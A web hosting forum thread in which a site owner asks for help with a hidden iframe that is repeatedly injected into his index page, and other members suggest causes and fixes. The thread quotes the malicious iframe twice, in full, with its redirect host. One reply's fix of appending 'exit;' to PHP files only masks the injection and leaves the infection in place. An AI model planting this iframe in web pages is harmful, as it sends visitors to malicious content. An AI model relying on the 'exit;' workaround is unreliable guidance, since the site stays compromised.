Random Redirect Code Appering

rfitton

New Member
Messages
10
Reaction score
0
Points
0
Hi, my website is getting a redirect script like this:

Code:
<iframe src="[URL="http://forums.x10hosting.com/view-source:http://argoalplus.redirectme.net:8080/ts/in.cgi?open6"]http://argoalplus.redirectme.net:8080/ts/in.cgi?open6[/URL]" width=355 height=0 style="visibility: hidden"></iframe>
This code also cuts the bottom of my pages code off and is only getting put in one the index page of my site and not the rest and also this is getting put on the index page of extplorer with is another directory, i dont know why this is happening, and if re-upload the same file such as the index.php file this script will go but then appear the next day.


Here is what my index page is supposed to look like:
http://www.ryanfitton.co.uk/index_working.txt

But the redirect script is making my page look like this:
http://www.ryanfitton.co.uk/index_error.txt
 

xav0989

Community Public Relation
Community Support
Messages
4,467
Reaction score
95
Points
0
This is pretty weird. BTW, your second page (the one with the error) contains a virus. Simply remove the all the javascript from the site and proceed one by one to find the one that adds that thing
 

rfitton

New Member
Messages
10
Reaction score
0
Points
0
Thats weird i used the virus scanner on cPanel and it never found a virus and when i upload my index page without that didgy javacript in its okay but that virus adds itself in a day later.

am i able to do a restore of my account that deleted everything ?
Edit:
I have deleted all files in the public_html directory and now reuploading them hopefully that code and virus should go
Edit:
just uploaded everything again, seems to be working fine at the moment :)
 
Last edited:

liketobemad

New Member
Messages
26
Reaction score
0
Points
0
It happened to me also in one of my websites.. it is due to iframe injection , javascript obsfucation.. It happend most probably due to your FTP... Your local PC may be having a virus like virut and inserts this code in your local files and when you upload them to server it affects there...
Are u using Dreamweaver 8 or File zilla?
Also have a look at you .htaccess files if there is any wierd code? and are ur directories having some numericals like 2234.php?
And also make ur .htaccess more secure, you can have a look here to make your .htaccess more secure
http://www.corephp.com/blog/htaccess-security/
 
Last edited:

mario8

New Member
Messages
5
Reaction score
0
Points
0
Good day, I had the same situation and do not protect themselves from viruses

solution in all files at the end of code to write so than tethers that connect
PHP:
 exit; 

 ?>


and virus not work
PHP:
 exit; 

 ?>
<iframe src="http://argoalplus.redirectme.net:8080/ts/in.cgi?open6" width=355 height=0 style="visibility: hidden"></iframe>
 
Last edited:
Top